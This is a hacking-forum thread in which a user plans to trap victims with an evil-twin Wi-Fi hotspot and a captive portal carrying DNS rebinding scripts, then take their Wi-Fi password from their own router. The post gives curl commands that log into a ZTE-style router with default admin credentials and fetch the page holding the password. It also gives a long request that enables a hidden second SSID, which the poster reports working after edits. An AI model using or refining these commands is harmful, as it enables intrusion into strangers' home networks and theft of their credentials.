chevron_left chevron_right
Login Register invert_colors photo_library
Stay updated and chat with others! - Join the Discord or the IRC.
Thread Rating:
  • 0 Vote(s) - 0 Average


filter_list how can i perform dns rebinding using evil twin in local level ?!
Author
Message
how can i perform dns rebinding using evil twin in local level ?! #1
as the title says i want to perform this attack https://sinister.ly/Thread-DNS-Rebinding-Attack

using evil twin on local level

the curl command to login into the router
Code:
curl "http://192.168.1.1/" --data "frashnum=&action=login&Frm_Logintoken=25&Username=admin&Password=admin"

the curl command to get the page that contains the wifi password
Code:
curl -v -X GET "http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_t.gch" -o 565.html

this how i was planing to perform the attack
evil twining a wifi using fluxion or whatever .... when the user opens the captive portal sign in network page (that has dns rebinding scripts in it )is detected we stop the ddos ... the user auto connects to his wifi then the page refreshes and execute the dns rebinding attack to get the wifi password from his router ....

but now i don't know how will get the html file back if want to use it in local level only so the other option was
to enable the second ssid that will launch with the default password so i can just login without getting any thing back
but i tried the curl command and it didn't work

Code:
curl "http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_wlan_essid_t.gch" -H "Origin: http://192.168.1.1" -H "Upgrade-Insecure-Requests: 1" -H "DNT: 1" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" -H "Referer: http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_wlan_essid_t.gch^&IF_VIEWID=IGD.LD1.WLAN2" --data "IF_ERRORSTR=SUCC^&IF_ERRORPARAM=SUCC^&IF_ERRORTYPE=-1^&IF_CONFIGTAG=Y^&IF_ACTION=apply^&WLAN_INSTNUM=4^&WLAN_SSID0=IGD.LD1.WLAN1^&WLAN_SSID1=IGD.LD1.WLAN2^&WLAN_SSID2=IGD.LD1.WLAN3^&WLAN_SSID3=IGD.LD1.WLAN4^&IF_SSIDATTR1=0^&IF_SSIDATTR2=0^&IF_SSIDATTR3=0^&IF_SSIDATTR4=0^&IF_VIEWID=IGD.LD1.WLAN2^&SettingStatus=CurruntSetting^&CardIsIn=1^&MaxInterface=4^&DeviceMode=InfrastructureAccessPoint^&CardMode=b^%^2Cg^%^2Cn^%^2Cbg^%^2Cgn^%^2Cbgn^&CardRev=0^&Class=255^&PID=33169^&VID=4332^&ValidIf=1^&Enable=1^&RadioStatus=NULL^&Standard=NULL^&BeaconInterval=NULL^&RtsCts=NULL^&Fragment=NULL^&DTIM=NULL^&TxPower=NULL^&CountryCode=NULL^&TxRate=NULL^&Channel=NULL^&ESSID=12345^&ESSIDPrefix=NULL^&ACLPolicy=NULL^&BeaconType=NULL^&WEPAuthMode=NULL^&WEPEncryptionLevel=NULL^&WEPKeyIndex=NULL^&WPAAuthMode=NULL^&WPAEncryptType=NULL^&WPAGroupRekey=NULL^&WPAEAPServerIp=NULL^&RadiusPort=NULL^&RadiusServerPort=NULL^&WPAEAPSecret=NULL^&PossibleChannels=NULL^&BasicDataRates=NULL^&OpDataRates=NULL^&PossibleTxRates=NULL^&OOBAccessEnabled=NULL^&BeaconEnabled=NULL^&ESSIDHideEnable=1^&RegulatoryDomain=NULL^&WlanMode=NULL^&DistanceFromRoot=NULL^&PeerBSSID=NULL^&AuthServiceMode=NULL^&QosType=NULL^&Priority=1^&UAPSDEnabled=NULL^&AutoChannelEnabled=NULL^&ChannelsInUse=NULL^&11iAuthMode=NULL^&11iEncryptType=NULL^&MaxUserNum=32^&SSIDIsolationEnable=NULL^&VapIsolationEnable=0^&Band=2.4G^&11nMode=1^&BandWidth=20Mhz^&SideBand=Lower^&11nRate=Auto^&SGIEnabled=0^&GreenField=0^&WdsMode=WDS_Disable^&Tx2Path=1^&IsPublicWiFiInterface=NULL^&MasterAuthServerIp=0.0.0.0^&MasterAuthServerPort=0^&MasterAuthServerSecret=^&Name=wlan0^&RealRF=1^&ChannelInUsed=8^&TxRateInUsed=Auto^&Bssid=54^%^3Abe^%^3A53^%^3A6a^%^3Af6^%^3Ac0^&IfStatus=Up^&UAPSDSupported=1^&WMMSupported=1^&TotalAssociations=4^&TotalBytesSent=2246220234^&TotalBytesReceived=3268409714^&TotalPacketsSent=22743088^&TotalPacketsReceived=14280169^&ErrorsSent=3057^&ErrorsReceived=0^&NonUnicastPacketsReceived=0^&UnicastPacketsSent=97163073747419137^&UnicastPacketsReceived=61100857587924993^&DiscardPacketsSent=8137^&DiscardPacketsReceived=68^&TotalPSKFailures=66^&TotalIntegrityFailures=6^&NumEasyPair=0^&ConnectStatus=Disconnected^&SingalQuality=0^&SingalStrength=0^&_SESSION_TOKEN=2714922195119803" --compressed

cause it needs to check a checkbox as i think

more about this problem
https://www.sitepoint.com/community/t/ho...ion/325785

edit i got the command working by removing every ^ from it

what do you think folks ?
(This post was last modified: 04-12-2019, 08:37 PM by mooooon.)

Reply






Users browsing this thread: 1 Guest(s)